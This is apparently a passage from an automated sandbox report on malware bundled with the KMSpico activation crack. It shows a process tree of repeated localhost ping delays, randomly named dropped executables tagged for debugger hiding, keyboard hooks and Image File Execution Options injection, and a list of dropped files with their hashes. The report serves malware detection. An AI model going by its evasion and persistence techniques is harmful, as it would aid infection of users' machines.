                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                    PID:9696
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:5348
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                      PID:13076
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:13128
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:13164
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:4008
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:4424
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                              PID:6276
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:940
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:6348
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                  PID:6720
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                  PID:6772
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                  PID:6876
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                  PID:6864
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:6040
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:10492
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                        PID:4088
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:828
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4276
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                            PID:5448
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                            PID:2320
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                            PID:3688
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                            PID:12988
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                            PID:7412
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:11036
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                              PID:4520
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:5396
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                PID:11592
                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:1636
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:5056
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:12276
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:12752
                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:9252
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                    PID:9084
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SECOH-QAD.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SECOH-QAD.exe C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:8028
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                      PID:8176
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\SLUI.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee;NotificationInterval=1440;Trigger=TimerEvent
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:8720
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\SLUI.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee;Trigger=TimerEvent
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:2120
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 232 -p 8060 -ip 8060
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:8492
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:10100
                                                                                                                                                                                                                                                                                                                        • C:\Program Files\KMSpico\KMSELDI.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files\KMSpico\KMSELDI.exe"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Indicator Removal: Clear Persistence
                                                                                                                                                                                                                                                                                                                          • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                          PID:10108
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x16c 0x504
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:1832
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:7960
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:12296
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:3712
                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:8828
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:6484
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:10216
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:8408

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\KVRT2020_Data\Temp\ioc4534A973-F295-FA40-B9D9-7628D6D76F78.bat

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      521B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d30655407c4beec036ced8a1ec48be28

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1dc3c5515be010d2b552afc1b8cef0bff1144462

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4ac97245cc6f3f0eeb1da90fd7c1a2a31b370d35abf08f38144c66d2f1f8afee

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      6f5ae67cb8e01013098f1af3f0aa81c6874279a304f1e2e820db171492386e38641d5ed66dade25a18b2833d5f448f977da8580f91a8f117d08aefc7cdf9cf06

                                                                                                                                                                                                                                                                                                                                    • C:\KVRT2020_Data\Temp\ioc4BFC58CF-9936-1140-9D64-8582E0E99E90.hta

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      729B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      ba7420d8f24c1ff51019f0f1c9bef42f

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      32f3e5fb2c92361bf1951d6000669ca99b5d32c0

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      9edbe7759cea1d70f9372c4583a6f17dd0a5086405d57e1116fc527893682b3d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4ffc85ad2f711b84aa8a98d1b64cdda6ec96a08f8721b2d7e267748d5a56dd80d8c92b4a7ed0ff9767aa0fbb94ee0fd7f9dad0ae95e0bd4b3480ec479dc58fe7

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\AutoPico.exe

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      728KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      cfe1c391464c446099a5eb33276f6d57

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9999bfcded2c953e025eabaa66b4971dab122c24

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4a714d98ce40f5f3577c306a66cb4a6b1ff3fd01047c7f4581f8558f0bcdf5fa

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4119a1722202bbc33339747ea02fd35b327890d55bb472cd1e2146ca446d8ba6fddb1e8cf8bbfaeb08aec8ed2a9d5c0fa71b73510d409ffacd3908fa72bb53b4

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\KMSELDI.exe

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      921KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f0280de3880ef581bf14f9cc72ec1c16

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      43d348e164c35f9e02370f6f66186fbfb15ae2a3

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      50ebfa1dd5b147e40244607d5d5be25709edf2cc66247a78beb920c77ac514cc

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ac31a972e9e93e6671f44d403139b0db89d950097c848fbaf6b9965b722215f74e9ed9bb9e083d31328101e6fcfe7f960a08b3bea0813900f11d5c1bb40539a6

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\UninsHs.exe

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      29KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      245824502aefe21b01e42f61955aa7f4

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a58682a8aae6302f1c934709c5aa1f6c86b2be99

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0a265b4bb8acceafaffb001632fa7e4c3f8ac39a71eda37f253e15bc1b8db90d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      204b39e31f22ba99cf09c5c8458fc94ea21b47aacc4abd305f71ba20a35d36bfc0ff53b95180542911c9c6f259db897dee76090d953f7ee18a8079caefda7981

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\logs\AutoPico.log

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      996cb8d9431ed739f5dcccf558ae5328

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1d1b8fad82c5f2f01ba1beceb4b5bc320ebb17b4

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4db01b5bcc60238aa1affa094d649719a3d92540cd2ad1697160d23698fcd32e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      0f6115aeba4d953fded16e93bd08381a6a9b5ebcba5415d1bb1549e0747416b79bfcfd4a1f95ba913580ff5e1e9f59abc9a6c3357ba4e8ac25f02d2bdac405ee

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\logs\KMSELDI.log

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3e04a47f800fd12c74563605fb6de76e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      95c14d3bd88a390e57be4f362b02456adc77da46

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      24a8d3b2ab6acae7e7d179cef0963f4f05798aa11693d966755ae260de3fdf3c

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9c64a611355f9ab45fbbedfeb7e2befad9af98d15efebe8315abfb1b50fc309b7d09e1226a43f3fd6895368ca9dd3b1f4992058db0148f02f83d99a603b7a722

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\logs\KMSELDI.log

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f376e1f7efcbcbbb4ff115b58f015a56

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1b72fffcf34f0b956b9f910fa03b09a0da54e4e7

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6aec8fa690d064e8c3a48aee632fc57cbe8585e4aee375895380a434b9996b7f

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      3f130af3192afe38f1be9d62ab3ed3443a54a08c95fd59dd8c3431ade60d1ab77ed5a48725c9e190828f0024ea897e1daf05e21d93f3d339205c88bac4db4079

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\logs\KMSELDI.log

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      5712c115b649d4408efe7b14402beb42

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      abe9e9c41c7993f3f287b2b4de372c6706f11b37

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      a9ca03d3c76936cd988844feb9bad39e0f95ae9688bf839d07ab04e2ab823fcc

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      04f6719e76d510a35d047ba1de3dd788a3ed103edf98e261c991b908c0b07432e9fb06d898da08b7ff50797f8c5aa1bf1d515d1fe5fd7aa6368a8a665759bfad

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\KMSpico\logs\KMSELDI.log

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      e4668a9890669b1311a1f4f2b7845469

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      ea2ea92c1e7ac7d608beb97145c85cc18ba00e29

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      8d176da293b7d354223d451c5371c0a98753844769f784d6d05f42ecd3cafb3d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      318943696762b05a2f769853d4da3e2c9d70de914207887ec6cc649b945540fd9b3634fb370e2145e964fb00dbfa66ac9cefd429dee7bd8ec5ae89e743abb0a7

                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1.9MB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7363a364bf9a688fe647bd9bb0fedbe7

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      70283567bbe9f1d19cf5348b76a3cc33d96a9dea

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      9e0581c28490820959bbf1834f3d49bab6fef795246f5aec1fef7966cb42c02e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4a3dfd1945d23f604d979fa198b2c217ca6dbeeaf0e8ae42df44308a40fab2c74a380b144bdc23d1e3a55c6002b118b17ee3f1239ffe9b59e03b911b9c0a51ac

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      40B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      0c6ee63ae5f1f90fd9e136ea9f5a1c38

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      2cbfa835b4069dca69a8c80e1ce618fa960d576a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      ef967acc918a10ac2314d2e4fc29578ba69ecb671a9aa5586c45f75cf42cd6f2

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      bc84d81802c9342e1158095b7d93fd7c3ceb170beec1ae1d3da81d41b1c40d8e03640fcc286686714a1232f19a625372d34090ecf0fadf5ee5c26b29959aa30d

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      649B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f2b75dc05bb7fdc6034060bf3d2f92f2

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      8735836a6566c72720f1b59181a2d7988ebbaf83

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6f9fe4b53ffb31d2420019179f74aa82998ac60a9626254e0ab7d5799bd622d7

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      85b8dbc9f65f7a9a17996faa7dca3ffc0fe031280da6f186384f7a48378f19556c692023941a1e743a05d8bd2b65160865875350edffaf4658a8ba24d70b9c3e

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

